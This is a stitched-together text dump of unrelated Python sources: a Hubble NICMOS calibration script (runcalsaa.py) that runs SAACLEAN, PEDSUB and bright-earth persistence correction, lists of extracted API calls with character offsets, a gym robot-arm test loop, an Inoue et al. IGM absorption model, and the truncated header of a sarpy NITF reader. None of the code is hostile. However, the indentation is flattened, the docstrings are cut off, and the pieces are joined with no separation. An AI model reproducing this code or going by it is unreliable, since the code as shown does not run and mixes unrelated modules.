1.2 (25-Mar-2009)
1.3 (15-Jun-2010)
          1.4.2 (5-Nov-2013)  MLS: changed return codes for opus
"""
from __future__ import print_function
import os,time,sys
from pyraf import iraf
from iraf import stsdas, hst_calib, nicmos,ctools
from iraf import saaclean
from nictools import nic_rem_persist
from astropy.io import fits as pyfits
import numpy as N
__version__ = '1.4.2'
__vdate__ = '25-Nov-2013'
__trlmarker__ = '*** CALNIC RUNCALSAA Processing Version %s %s ***\n'%(__version__,__vdate__)
"""
These return codes have been changed as requested by opus so that they can detect a return
value of 1 as a real error for the shell script, see #1078
"""
_success = 0
_none = 4
_error = 1
_abort = 3
# Constants relevant to saaclean
statdict_saaclean = {'none':_none,'low only':_success,'high only':_success,
'both':_success,'n/a':_none,'aborted':_abort}
donestring = {_none:'OMITTED',_success:'PERFORMED',_abort:'SKIPPED',
_error:'SKIPPED'}
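# statdict_saaclean maps the saaclean task's 'applied' result onto the numeric
# completion codes defined above (0/4/1/3); donestring maps those codes onto
# the values written to the SAADONE/BEPDONE header keywords.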
def run(rawname,debug=False):
#............................................................
# Setup
#............................................................
saadone = _none
bepdone = _none
if '_raw' not in rawname:
print("""ERROR: this script takes ipppssoot_raw.fits file as input:
you provided %s"""%rawname)
        return _error
# Define file names
calname = rawname.replace('_raw','_cal')
pedname = rawname.replace('_raw','_ped')
pedname2 = rawname.replace('_raw','_ped2')
outname = rawname.replace('_raw','_scn_applied')
saapername = rawname.replace('_raw','_spr')
pedtrlname = rawname.replace('_raw.fits','_pedsb_trl.txt')
F_A = calname
F_B = pedname
F_C = outname
F_D = pedname2
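    # Shorthand for the files passed between stages: F_A is the input _cal
    # file, F_B the _ped file from the first PEDSUB run, F_C the SAACLEAN
    # output, and F_D the _ped2 file from the second PEDSUB run.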
# Establish connection to the trailer file
trlname = rawname.replace('_raw.fits','_trl.txt')
Trl = open( trlname,'a')
Trl.write(_timestamp('RUNCALSAA starting'))
Trl.write(__trlmarker__)
# Open the calfile header and determine whether the script should run
f = pyfits.open(calname)
prihdr = f[0].header
# Get some things from the calfile header
saaparname = f[0].header['saacntab']
pedparname = f[0].header['pedsbtab']
camera = f[0].header['camera']
# Trap the case where no PEDSBTAB was provided, as this reference file is
# required for running PEDSUB.
if pedparname == 'N/A':
# No PEDSUB reference file, so turn off all processing.
dosaa=False
saadone=_abort
dobep=False
bepdone=_abort
else:
if 'saacorr' in prihdr:
dosaa = (prihdr['saacorr'] == 'PERFORM')
else:
dosaa = False
saadone = _abort
if 'bepcorr' in prihdr:
dobep = (prihdr['bepcorr'] == 'PERFORM')
else:
dobep = False
bepdone = _abort
if ((dosaa or dobep) and (f[0].header['flatdone'] == 'PERFORMED') and (f[0].header['flatfile'] != 'N/A')):
pass # keep running
else:
Trl.write(_timestamp('RUNCALSAA omitted'))
Trl.close()
set_keys_final( _abort, _abort, F_A, donestring, saapername)
# No files to delete
f.close()
return _none
f.close()
try: # get pedsub pars for SAACLEAN, BEP, or both
kwpars = get_pedsub_pars( camera, pedparname, Trl, F_A, saapername, debug=debug)
except Exception as e:
handle_exception(e, Trl, [], debug = debug)
set_keys_final( _abort, _abort, F_A, donestring, saapername )
# no copy to final as it already is cal, no files to delete
return _abort
if (dosaa):
if (f[0].header['saadone'] == 'PERFORMED'):
saadone = _abort
F_S1 = F_A # set file that is the final for 'stage 1' to file F_A
else: # f[0].header['saadone'] != 'PERFORMED'):
try: # for do_pedsub
do_pedsub(pedparname, Trl, pedtrlname, F_A, F_B, kwpars, saapername)
except Exception as e:
handle_exception(e, Trl, [], debug = debug)
set_keys_final( _abort, _abort, F_A, donestring,saapername )
# no copy to final as it already is cal, no files to delete
return _abort
saadone, F_S1 = do_saaclean(F_B, F_A, F_C, trlname, saaparname, camera, saapername, Trl, debug=debug)
else: # dosaa is False
F_S1 = F_A # set file that is the final for 'stage 1' to file F_A
if (dobep):
try:
do_pedsub(pedparname, Trl, pedtrlname, F_S1, F_D, kwpars,saapername)
except Exception as e:
handle_exception(e, Trl, [], debug = debug)
set_keys_final(_abort,_abort, F_A, donestring,saapername )
# no copy to final as it already is cal, no files to delete
return _abort
bepdone, F_Final = do_bright_ep( F_D, F_S1, Trl, donestring, debug=debug )
else: # dobep is False
F_Final = F_S1
set_keys_final(saadone, bepdone, F_S1, donestring, saapername)
os.rename( F_Final, calname)
Trl.write(_timestamp('RUNCALSAA completed'))
Trl.close()
return _success
def set_keys_final(saadone, bepdone, F_Final, donestring, saapername):
""" Set values for saadone and bepdone in the final cal file
    @param saadone: status code mapped to the SAADONE keyword value
    @type saadone: int
    @param bepdone: status code mapped to the BEPDONE keyword value
    @type bepdone: int
@param F_Final: name of final cal file
@type F_Final: string
@param donestring: mapping of strings for done keys
@type donestring: dict
@param saapername: name of persistence model created by SAACLEAN
@type saapername: string
"""
fh = pyfits.open( F_Final, mode = 'update' )
fh[0].header.update('saadone',donestring[saadone])
fh[0].header.update('bepdone',donestring[bepdone])
if saapername != None:
fh[0].header.update('SAACRMAP',saapername)
fh.close()
def get_pedsub_pars( camera, pedparname, Trl, pedsub_file, saapername, debug=False ):
""" Get keyword parameter values for pedsub
@param camera: camera number
@type camera: int
@param pedparname: parameter file name
@type pedparname: string
@param Trl: trailer file name
@type Trl: string
@param pedsub_file: name of file with pedsub pars
@type pedsub_file: string
@param saapername: name of file for SAA persistence image
@type saapername: string
@return: kwpars
@rtype: dict
"""
# Get params from the pedsubtab
try:
kwpars = getkwpars(camera,iraf.osfn(pedparname))
except Exception as e:
set_keys_final(_error,_error, pedsub_file, donestring,saapername)
handle_exception(e, Trl, [], debug = debug)
return _error
return kwpars
def do_pedsub( pedparname, Trl, pedtrlname, file_1, file_2, kwpars, saapername):
""" Call pedsub
@param pedparname: parameter file name
@type pedparname: string
@param Trl: trailer file name
@type Trl: string
@param pedtrlname: pedsub's trailer file name
@type pedtrlname: string
@param file_1: name of input cal file
@type file_1: string
@param file_2: name of output ped file
@type file_2: string
@param kwpars: keyword params for pedsub
@type kwpars: dict
@param saapername: name of file for SAA persistence image
@type saapername: string
"""
pedsub_complete='=== PEDSUB finished'
# Timestamp the trailer file
    Trl.write(_timestamp('PEDSUB starting with params from %s'%pedparname))
# Run pedsub with output directed to special file
iraf.flprcache()
iraf.pedsub.unlearn()
iraf.pedsub(input = file_1, output = file_2, Stdout = pedtrlname, **kwpars)
# Examine task output & append to trailer file
pedout = open( pedtrlname )
for line in pedout:
Trl.write( line )
pedout.close()
os.remove(pedtrlname)
if not line.startswith(pedsub_complete):
raise PedsubError
def do_saaclean( calcimage, targimage, output, trlname, saaparname, camera, saapername, Trl, debug=False):
""" Call saaclean
@param calcimage: calc file name
    @type calcimage: string
@param targimage: target file name
@type targimage: string
@param trlname: trailer file name
@type trlname: string
@param saaparname: file name for SAACLEAN pars
@type saaparname: string
@param camera: camera number
@type camera: int
@param saapername: file name for SAACLEAN persistence
@type saapername: string
@param Trl: trailer file
@type Trl: string
@return: saadone, stage 1 file
@rtype: int, string
"""
Trl.write(_timestamp('SAACLEAN starting from pars in %s'%saaparname))
# Get the task parameters from the saacntab
try:
kwpars = getkwpars( camera,iraf.osfn(saaparname) )
except Exception as e:
handle_exception( e, Trl, [calcimage], debug=debug )
saadone = _error
return saadone, targimage
#
# Run the saaclean task
try:
iraf.saaclean.unlearn()
iraf.saaclean(calcimage = calcimage,
targimage = targimage,
output = output,
saaperfile = saapername,
Stderr = Trl, **kwpars)
retstat = statdict_saaclean[ iraf.saaclean.applied ]
if not debug:
if retstat == _abort:
saadone = _abort
F_S1 = targimage # set file that is the final for 'stage 1' to file targimage
Trl.write(_timestamp('SAACLEAN aborted'))
if os.path.exists(output): os.remove(output)
elif retstat == _none:
saadone = _none
F_S1 = targimage # set file that is the final for 'stage 1' to file targimage
Trl.write(_timestamp('SAACLEAN omitted'))
if os.path.exists(output): os.remove(output)
else: # retstat is SUCCESS
saadone = _success
F_S1 = output # set file that is the final for 'stage 1'
Trl.write(_timestamp('SAACLEAN completed'))
fh_targ = pyfits.open(targimage, mode='update')
fh_targ[0].header.update(key = 'SAACRMAP', value = saapername )
fh_targ.close()
else:
saadone = retstat
if retstat == _abort or retstat == _none:
F_S1 = targimage
else:
F_S1 = output
os.rename( targimage,targimage.replace('_cal.','_orig_cal.'))
os.rename( output,targimage )
os.remove( calcimage) # remove ped file (calcimage) because 2nd pedsub will need to write to it
# Return end of phase 1 final file
return saadone, F_S1
except Exception as e:
if os.path.exists( calcimage ):
os.remove( calcimage) # remove ped file (calcimage) because 2nd pedsub will need to write to it
handle_exception(e, Trl, [calcimage, output], debug = debug)
saadone = _error
F_S1 = targimage
return saadone, targimage
def do_bright_ep( calcimage, targimage, Trl, donestring, debug=False):
""" Do bright earth persistence correction
@param calcimage: calc file name
    @type calcimage: string
    @param targimage: target file name
    @type targimage: string
    @param Trl: trailer file (open file object)
    @type Trl: file object
    @param donestring: mapping of strings for done keys
    @type donestring: dict
@return: bepdone, final cal file
@rtype: int, string
"""
Trl.write(_timestamp('BEP starting' ))
# Run the nic_rem_persist task
try:
# When nic_rem_persist reset sys.stdout, IPython did not pick up on the
# change back when nrp.persist() completed, and shut down the entire IPython
# session when Trl.close() was called.
# We need to manage sys.stdout here to allow IPython to recognize that
# we are resetting it back before closing the Trl file.
sys.orig_stdout = sys.stdout
sys.stdout = Trl
nrp = nic_rem_persist.NicRemPersist( calcfile = calcimage, targfile = targimage, run_stdout = None) # set task's stdout to trailer file
nrp_stat = nrp.persist()
bepdone = nrp_stat
if (donestring[nrp_stat] == 'OMITTED'):
Trl.write(_timestamp('BEP aborted'))
elif (donestring[nrp_stat] == 'PERFORMED'):
Trl.write(_timestamp('BEP completed'))
else:
Trl.write(_timestamp('BEP skipped'))
# Set sys.stdout back to normal now that all Trl messages have been written out
sys.stdout = sys.orig_stdout
if os.path.exists( calcimage ):
os.remove( calcimage) # remove ped file (calcimage)
return bepdone, targimage
# If nic_rem_persist fails, we can't proceed. End with an error.
except Exception as e:
if os.path.exists( calcimage ):
os.remove( calcimage) # remove ped file (calcimage)
handle_exception(e, Trl, [calcimage], debug = debug)
# Reset sys.stdout back to normal...
sys.stdout = sys.orig_stdout
bepdone = _none
return bepdone, targimage
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class PedsubError(Exception):
def __str__(self):
return "PEDSUB ended with error"
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Utility functions
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def handle_exception(e,trl,files_to_delete,debug=False):
""" Print various useful information to various useful places """
print(str(e))
trl.write(_timestamp("Encountered exception"))
trl.write(str(e))
if not debug:
trl.write('\n Cleaning up interim files \n')
#Clean up files
for fname in files_to_delete:
if os.path.isfile(fname):
os.remove(fname)
trl.write(_timestamp('RUNCALSAA completed with errors'))
def getkwpars(camera,parname):
"""Extract the correct row of the parameter file based on the
value of CAMERA. Parameters are returned as a keyword:value
dictionary."""
d={}
f=pyfits.open(parname)
t=f[1].data
cols=f[1].columns
# Pick out the matching row of the "camera" column.
cams = t.field('camera')
idx = N.where(cams == camera)[0][0]
#..........................^^^^^^
# (The ugly [0][0] syntax is because numarray.where returns
# a tuple of arrays, and in this case we just want the
# actual scalar value that can be used to index the other
# columns in the table).
for k in cols:
d[k.name] = t.field(k.name)[idx]
del d['camera']
f.close()
return d
def _timestamp(_process_name):
"""Create formatted time string recognizable by OPUS."""
_prefix = time.strftime("\n%Y%j%H%M%S-I-----",time.localtime())
_lenstr = 60 - len(_process_name)
return _prefix+_process_name+(_lenstr*'-')+'\n'
def _getTime():
# Format time values for keywords IRAF-TLM, and DATE
_ltime = time.localtime(time.time())
time_str = time.strftime('%H:%M:%S (%d-%b-%Y)',_ltime)
return time_str
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Run from the shell.
if __name__ == '__main__':
# Look for debug flag
debug = " -d " in sys.argv
# Handle arguments
if len(sys.argv) > 3 or len(sys.argv) < 2:
print("syntax: runcalsaa.py [-d] inputfilename")
sys.exit(_error)
rawname = sys.argv[-1]
# Run script with error checking
try:
retstat = run(rawname,debug=debug)
except Exception as e:
print(str(e))
print("ERROR: RUNCALSAA failed on %s"%rawname)
retstat = _error
# Return status
sys.exit(retstat)
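# --- Illustrative invocation (added commentary; not part of the original script) ---
# The usage message above implies the script is run from the shell as, e.g.:
#
#     python runcalsaa.py -d <inputfilename>
#
# where <inputfilename> is the raw file to process and the optional -d flag
# enables debug mode, in which interim files are not cleaned up on error.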
|
[
"pyraf.iraf.flprcache",
"os.remove",
"os.rename",
"nictools.nic_rem_persist.NicRemPersist",
"os.path.exists",
"time.strftime",
"pyraf.iraf.pedsub",
"pyraf.iraf.saaclean.unlearn",
"time.time",
"os.path.isfile",
"numpy.where",
"time.localtime",
"astropy.io.fits.open",
"pyraf.iraf.pedsub.unlearn",
"pyraf.iraf.osfn",
"pyraf.iraf.saaclean",
"sys.exit"
] |
[((3892, 3912), 'astropy.io.fits.open', 'pyfits.open', (['calname'], {}), '(calname)\n', (3903, 3912), True, 'from astropy.io import fits as pyfits\n'), ((6895, 6922), 'os.rename', 'os.rename', (['F_Final', 'calname'], {}), '(F_Final, calname)\n', (6904, 6922), False, 'import os, time, sys\n'), ((7553, 7588), 'astropy.io.fits.open', 'pyfits.open', (['F_Final'], {'mode': '"""update"""'}), "(F_Final, mode='update')\n", (7564, 7588), True, 'from astropy.io import fits as pyfits\n'), ((9460, 9476), 'pyraf.iraf.flprcache', 'iraf.flprcache', ([], {}), '()\n', (9474, 9476), False, 'from pyraf import iraf\n'), ((9481, 9502), 'pyraf.iraf.pedsub.unlearn', 'iraf.pedsub.unlearn', ([], {}), '()\n', (9500, 9502), False, 'from pyraf import iraf\n'), ((9507, 9576), 'pyraf.iraf.pedsub', 'iraf.pedsub', ([], {'input': 'file_1', 'output': 'file_2', 'Stdout': 'pedtrlname'}), '(input=file_1, output=file_2, Stdout=pedtrlname, **kwpars)\n', (9518, 9576), False, 'from pyraf import iraf\n'), ((9746, 9767), 'os.remove', 'os.remove', (['pedtrlname'], {}), '(pedtrlname)\n', (9755, 9767), False, 'import os, time, sys\n'), ((15999, 16019), 'astropy.io.fits.open', 'pyfits.open', (['parname'], {}), '(parname)\n', (16010, 16019), True, 'from astropy.io import fits as pyfits\n'), ((16925, 16969), 'time.strftime', 'time.strftime', (['"""%H:%M:%S (%d-%b-%Y)"""', '_ltime'], {}), "('%H:%M:%S (%d-%b-%Y)', _ltime)\n", (16938, 16969), False, 'import os, time, sys\n'), ((17587, 17604), 'sys.exit', 'sys.exit', (['retstat'], {}), '(retstat)\n', (17595, 17604), False, 'import os, time, sys\n'), ((10896, 10919), 'pyraf.iraf.saaclean.unlearn', 'iraf.saaclean.unlearn', ([], {}), '()\n', (10917, 10919), False, 'from pyraf import iraf\n'), ((10928, 11047), 'pyraf.iraf.saaclean', 'iraf.saaclean', ([], {'calcimage': 'calcimage', 'targimage': 'targimage', 'output': 'output', 'saaperfile': 'saapername', 'Stderr': 'Trl'}), '(calcimage=calcimage, targimage=targimage, output=output,\n saaperfile=saapername, Stderr=Trl, **kwpars)\n', (10941, 11047), False, 'from pyraf import iraf\n'), ((12489, 12509), 'os.remove', 'os.remove', (['calcimage'], {}), '(calcimage)\n', (12498, 12509), False, 'import os, time, sys\n'), ((13888, 13978), 'nictools.nic_rem_persist.NicRemPersist', 'nic_rem_persist.NicRemPersist', ([], {'calcfile': 'calcimage', 'targfile': 'targimage', 'run_stdout': 'None'}), '(calcfile=calcimage, targfile=targimage,\n run_stdout=None)\n', (13917, 13978), False, 'from nictools import nic_rem_persist\n'), ((14484, 14509), 'os.path.exists', 'os.path.exists', (['calcimage'], {}), '(calcimage)\n', (14498, 14509), False, 'import os, time, sys\n'), ((16687, 16703), 'time.localtime', 'time.localtime', ([], {}), '()\n', (16701, 16703), False, 'import os, time, sys\n'), ((16897, 16908), 'time.time', 'time.time', ([], {}), '()\n', (16906, 16908), False, 'import os, time, sys\n'), ((17299, 17315), 'sys.exit', 'sys.exit', (['_error'], {}), '(_error)\n', (17307, 17315), False, 'import os, time, sys\n'), ((8418, 8439), 'pyraf.iraf.osfn', 'iraf.osfn', (['pedparname'], {}), '(pedparname)\n', (8427, 8439), False, 'from pyraf import iraf\n'), ((10673, 10694), 'pyraf.iraf.osfn', 'iraf.osfn', (['saaparname'], {}), '(saaparname)\n', (10682, 10694), False, 'from pyraf import iraf\n'), ((12698, 12723), 'os.path.exists', 'os.path.exists', (['calcimage'], {}), '(calcimage)\n', (12712, 12723), False, 'import os, time, sys\n'), ((14525, 14545), 'os.remove', 'os.remove', (['calcimage'], {}), '(calcimage)\n', (14534, 14545), False, 'import os, time, sys\n'), ((14717, 
14742), 'os.path.exists', 'os.path.exists', (['calcimage'], {}), '(calcimage)\n', (14731, 14742), False, 'import os, time, sys\n'), ((15686, 15707), 'os.path.isfile', 'os.path.isfile', (['fname'], {}), '(fname)\n', (15700, 15707), False, 'import os, time, sys\n'), ((16154, 16177), 'numpy.where', 'N.where', (['(cams == camera)'], {}), '(cams == camera)\n', (16161, 16177), True, 'import numpy as N\n'), ((11467, 11489), 'os.path.exists', 'os.path.exists', (['output'], {}), '(output)\n', (11481, 11489), False, 'import os, time, sys\n'), ((12450, 12478), 'os.rename', 'os.rename', (['output', 'targimage'], {}), '(output, targimage)\n', (12459, 12478), False, 'import os, time, sys\n'), ((12739, 12759), 'os.remove', 'os.remove', (['calcimage'], {}), '(calcimage)\n', (12748, 12759), False, 'import os, time, sys\n'), ((14758, 14778), 'os.remove', 'os.remove', (['calcimage'], {}), '(calcimage)\n', (14767, 14778), False, 'import os, time, sys\n'), ((15725, 15741), 'os.remove', 'os.remove', (['fname'], {}), '(fname)\n', (15734, 15741), False, 'import os, time, sys\n'), ((11491, 11508), 'os.remove', 'os.remove', (['output'], {}), '(output)\n', (11500, 11508), False, 'import os, time, sys\n'), ((11750, 11772), 'os.path.exists', 'os.path.exists', (['output'], {}), '(output)\n', (11764, 11772), False, 'import os, time, sys\n'), ((12027, 12064), 'astropy.io.fits.open', 'pyfits.open', (['targimage'], {'mode': '"""update"""'}), "(targimage, mode='update')\n", (12038, 12064), True, 'from astropy.io import fits as pyfits\n'), ((11774, 11791), 'os.remove', 'os.remove', (['output'], {}), '(output)\n', (11783, 11791), False, 'import os, time, sys\n')]
|
import gym
import numpy as np
from gym_UR3.envs.mujoco import MujocoUR3Env
import time
def main():
env = gym.make('UR3-v0')
Da = env.action_space.shape[0]
obs=env.reset()
start = time.time()
for i in range(100):
env.reset()
print('{}th episode'.format(i+1))
for j in range(100):
env.render()
# env.step(env.action_space.sample())
a = np.zeros(8)
a[:6] = 0.01*np.random.uniform(size = 6)
a[-1] = 1
a[-2] = 1
env.step(a)
end = time.time()
print('Done! {}'.format(end-start))
#action[0] : qpos[0] radian
#action[4] : qpos[4] radian
#action[5] : qpos[5] radian
#action[6] : qpos[7] radians, maybe? anyway, the bottom finger
#action[7] : qpos[11] radians, maybe? anyway, the top finger
#action[8] : qpos[15] radians, maybe? anyway, the middle finger
#action[9] : qpos[6] qpos[10] radians, maybe? anyway, the bottom and top fingers spread apart vertically
if __name__=="__main__":
main()
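# Added note: the loop above is essentially a smoke test -- it resets the
# environment for 100 episodes and steps each one 100 times, applying small
# random commands to the first six (arm) action channels while holding the
# last two gripper-related channels at 1, and rendering every step.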
|
[
"numpy.random.uniform",
"numpy.zeros",
"gym.make",
"time.time"
] |
[((115, 133), 'gym.make', 'gym.make', (['"""UR3-v0"""'], {}), "('UR3-v0')\n", (123, 133), False, 'import gym\n'), ((201, 212), 'time.time', 'time.time', ([], {}), '()\n', (210, 212), False, 'import time\n'), ((581, 592), 'time.time', 'time.time', ([], {}), '()\n', (590, 592), False, 'import time\n'), ((425, 436), 'numpy.zeros', 'np.zeros', (['(8)'], {}), '(8)\n', (433, 436), True, 'import numpy as np\n'), ((462, 487), 'numpy.random.uniform', 'np.random.uniform', ([], {'size': '(6)'}), '(size=6)\n', (479, 487), True, 'import numpy as np\n')]
|
import os
import numpy as np
from . import __file__ as filepath
__all__ = ["Inoue14"]
class Inoue14(object):
def __init__(self, scale_tau=1.):
"""
IGM absorption from Inoue et al. (2014)
Parameters
----------
scale_tau : float
Parameter multiplied to the IGM :math:`\tau` values (exponential
in the linear absorption fraction).
I.e., :math:`f_\mathrm{igm} = e^{-\mathrm{scale\_tau} \tau}`.
"""
self._load_data()
self.scale_tau = scale_tau
def _load_data(self):
path = os.path.join(os.path.dirname(filepath),'data')
#print path
LAF_file = os.path.join(path, 'LAFcoeff.txt')
DLA_file = os.path.join(path, 'DLAcoeff.txt')
data = np.loadtxt(LAF_file, unpack=True)
ix, lam, ALAF1, ALAF2, ALAF3 = data
self.lam = lam[:,np.newaxis]
self.ALAF1 = ALAF1[:,np.newaxis]
self.ALAF2 = ALAF2[:,np.newaxis]
self.ALAF3 = ALAF3[:,np.newaxis]
data = np.loadtxt(DLA_file, unpack=True)
ix, lam, ADLA1, ADLA2 = data
self.ADLA1 = ADLA1[:,np.newaxis]
self.ADLA2 = ADLA2[:,np.newaxis]
return True
@property
def NA(self):
"""
Number of Lyman-series lines
"""
return self.lam.shape[0]
def tLSLAF(self, zS, lobs):
"""
Lyman series, Lyman-alpha forest
"""
z1LAF = 1.2
z2LAF = 4.7
l2 = self.lam #[:, np.newaxis]
x0 = (lobs < l2*(1+zS))
x1 = x0 & (lobs < l2*(1+z1LAF))
x2 = x0 & ((lobs >= l2*(1+z1LAF)) & (lobs < l2*(1+z2LAF)))
x3 = x0 & (lobs >= l2*(1+z2LAF))
tLSLAF_value = np.zeros_like(lobs*l2)
tLSLAF_value[x1] += ((self.ALAF1/l2**1.2)*lobs**1.2)[x1]
tLSLAF_value[x2] += ((self.ALAF2/l2**3.7)*lobs**3.7)[x2]
tLSLAF_value[x3] += ((self.ALAF3/l2**5.5)*lobs**5.5)[x3]
return tLSLAF_value.sum(axis=0)
def tLSDLA(self, zS, lobs):
"""
Lyman Series, DLA
"""
z1DLA = 2.0
l2 = self.lam #[:, np.newaxis]
tLSDLA_value = np.zeros_like(lobs*l2)
x0 = (lobs < l2*(1+zS)) & (lobs < l2*(1.+z1DLA))
x1 = (lobs < l2*(1+zS)) & ~(lobs < l2*(1.+z1DLA))
tLSDLA_value[x0] += ((self.ADLA1/l2**2)*lobs**2)[x0]
tLSDLA_value[x1] += ((self.ADLA2/l2**3)*lobs**3)[x1]
return tLSDLA_value.sum(axis=0)
def tLCDLA(self, zS, lobs):
"""
Lyman continuum, DLA
"""
z1DLA = 2.0
lamL = 911.8
tLCDLA_value = np.zeros_like(lobs)
x0 = lobs < lamL*(1.+zS)
if zS < z1DLA:
tLCDLA_value[x0] = 0.2113 * _pow(1.0+zS, 2) - 0.07661 * _pow(1.0+zS, 2.3) * _pow(lobs[x0]/lamL, (-3e-1)) - 0.1347 * _pow(lobs[x0]/lamL, 2)
else:
x1 = lobs >= lamL*(1.+z1DLA)
tLCDLA_value[x0 & x1] = 0.04696 * _pow(1.0+zS, 3) - 0.01779 * _pow(1.0+zS, 3.3) * _pow(lobs[x0 & x1]/lamL, (-3e-1)) - 0.02916 * _pow(lobs[x0 & x1]/lamL, 3)
tLCDLA_value[x0 & ~x1] =0.6340 + 0.04696 * _pow(1.0+zS, 3) - 0.01779 * _pow(1.0+zS, 3.3) * _pow(lobs[x0 & ~x1]/lamL, (-3e-1)) - 0.1347 * _pow(lobs[x0 & ~x1]/lamL, 2) - 0.2905 * _pow(lobs[x0 & ~x1]/lamL, (-3e-1))
return tLCDLA_value
def tLCLAF(self, zS, lobs):
"""
Lyman continuum, LAF
"""
z1LAF = 1.2
z2LAF = 4.7
lamL = 911.8
tLCLAF_value = np.zeros_like(lobs)
x0 = lobs < lamL*(1.+zS)
if zS < z1LAF:
tLCLAF_value[x0] = 0.3248 * (_pow(lobs[x0]/lamL, 1.2) - _pow(1.0+zS, -9e-1) * _pow(lobs[x0]/lamL, 2.1))
elif zS < z2LAF:
x1 = lobs >= lamL*(1+z1LAF)
tLCLAF_value[x0 & x1] = 2.545e-2 * (_pow(1.0+zS, 1.6) * _pow(lobs[x0 & x1]/lamL, 2.1) - _pow(lobs[x0 & x1]/lamL, 3.7))
tLCLAF_value[x0 & ~x1] = 2.545e-2 * _pow(1.0+zS, 1.6) * _pow(lobs[x0 & ~x1]/lamL, 2.1) + 0.3248 * _pow(lobs[x0 & ~x1]/lamL, 1.2) - 0.2496 * _pow(lobs[x0 & ~x1]/lamL, 2.1)
else:
x1 = lobs > lamL*(1.+z2LAF)
x2 = (lobs >= lamL*(1.+z1LAF)) & (lobs < lamL*(1.+z2LAF))
x3 = lobs < lamL*(1.+z1LAF)
tLCLAF_value[x0 & x1] = 5.221e-4 * (_pow(1.0+zS, 3.4) * _pow(lobs[x0 & x1]/lamL, 2.1) - _pow(lobs[x0 & x1]/lamL, 5.5))
tLCLAF_value[x0 & x2] = 5.221e-4 * _pow(1.0+zS, 3.4) * _pow(lobs[x0 & x2]/lamL, 2.1) + 0.2182 * _pow(lobs[x0 & x2]/lamL, 2.1) - 2.545e-2 * _pow(lobs[x0 & x2]/lamL, 3.7)
tLCLAF_value[x0 & x3] = 5.221e-4 * _pow(1.0+zS, 3.4) * _pow(lobs[x0 & x3]/lamL, 2.1) + 0.3248 * _pow(lobs[x0 & x3]/lamL, 1.2) - 3.140e-2 * _pow(lobs[x0 & x3]/lamL, 2.1)
return tLCLAF_value
def full_IGM(self, z, lobs):
"""Get full Inoue IGM absorption
Parameters
----------
z : float
Redshift to evaluate IGM absorption
lobs : array
Observed-frame wavelength(s) in Angstroms.
Returns
-------
        abs : array
            IGM transmission factor, exp(-scale_tau * tau)
"""
tau_LS = self.tLSLAF(z, lobs) + self.tLSDLA(z, lobs)
tau_LC = self.tLCLAF(z, lobs) + self.tLCDLA(z, lobs)
### Upturn at short wavelengths, low-z
#k = 1./100
#l0 = 600-6/k
#clip = lobs/(1+z) < 600.
#tau_clip = 100*(1-1./(1+np.exp(-k*(lobs/(1+z)-l0))))
tau_clip = 0.
return np.exp(-self.scale_tau*(tau_LC + tau_LS + tau_clip))
def build_grid(self, zgrid, lrest):
"""Build a spline interpolation object for fast IGM models
Returns: self.interpolate
"""
from scipy.interpolate import CubicSpline
igm_grid = np.zeros((len(zgrid), len(lrest)))
for iz in range(len(zgrid)):
igm_grid[iz,:] = self.full_IGM(zgrid[iz], lrest*(1+zgrid[iz]))
self.interpolate = CubicSpline(zgrid, igm_grid)
def _pow(a, b):
"""C-like power, a**b
"""
return a**b
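# --- Illustrative usage sketch (added; not part of the original module) ---
# Assumes the packaged LAFcoeff.txt / DLAcoeff.txt data files are available,
# as _load_data() requires; the redshift and wavelengths below are arbitrary.
#
#     igm = Inoue14(scale_tau=1.0)
#     lam_obs = np.linspace(3000.0, 9000.0, 7)   # observed-frame Angstroms
#     transmission = igm.full_IGM(3.0, lam_obs)  # exp(-scale_tau * tau) at z = 3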
|
[
"numpy.zeros_like",
"scipy.interpolate.CubicSpline",
"os.path.dirname",
"numpy.exp",
"numpy.loadtxt",
"os.path.join"
] |
[((692, 726), 'os.path.join', 'os.path.join', (['path', '"""LAFcoeff.txt"""'], {}), "(path, 'LAFcoeff.txt')\n", (704, 726), False, 'import os\n'), ((746, 780), 'os.path.join', 'os.path.join', (['path', '"""DLAcoeff.txt"""'], {}), "(path, 'DLAcoeff.txt')\n", (758, 780), False, 'import os\n'), ((801, 834), 'numpy.loadtxt', 'np.loadtxt', (['LAF_file'], {'unpack': '(True)'}), '(LAF_file, unpack=True)\n', (811, 834), True, 'import numpy as np\n'), ((1063, 1096), 'numpy.loadtxt', 'np.loadtxt', (['DLA_file'], {'unpack': '(True)'}), '(DLA_file, unpack=True)\n', (1073, 1096), True, 'import numpy as np\n'), ((1829, 1853), 'numpy.zeros_like', 'np.zeros_like', (['(lobs * l2)'], {}), '(lobs * l2)\n', (1842, 1853), True, 'import numpy as np\n'), ((2263, 2287), 'numpy.zeros_like', 'np.zeros_like', (['(lobs * l2)'], {}), '(lobs * l2)\n', (2276, 2287), True, 'import numpy as np\n'), ((2758, 2777), 'numpy.zeros_like', 'np.zeros_like', (['lobs'], {}), '(lobs)\n', (2771, 2777), True, 'import numpy as np\n'), ((3663, 3682), 'numpy.zeros_like', 'np.zeros_like', (['lobs'], {}), '(lobs)\n', (3676, 3682), True, 'import numpy as np\n'), ((5708, 5762), 'numpy.exp', 'np.exp', (['(-self.scale_tau * (tau_LC + tau_LS + tau_clip))'], {}), '(-self.scale_tau * (tau_LC + tau_LS + tau_clip))\n', (5714, 5762), True, 'import numpy as np\n'), ((6186, 6214), 'scipy.interpolate.CubicSpline', 'CubicSpline', (['zgrid', 'igm_grid'], {}), '(zgrid, igm_grid)\n', (6197, 6214), False, 'from scipy.interpolate import CubicSpline\n'), ((614, 639), 'os.path.dirname', 'os.path.dirname', (['filepath'], {}), '(filepath)\n', (629, 639), False, 'import os\n'), ((1583, 1607), 'numpy.zeros_like', 'np.zeros_like', (['(lobs * l2)'], {}), '(lobs * l2)\n', (1596, 1607), True, 'import numpy as np\n')]
|
"""
Work in progress for reading some other kind of complex NITF.
"""
__classification__ = "UNCLASSIFIED"
__author__ = "<NAME>"
import logging
from typing import Union, Tuple, List, Optional, Callable, Sequence
import copy
from datetime import datetime
import numpy
from scipy.constants import foot
from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf
from sarpy.geometry.latlon import num as lat_lon_parser
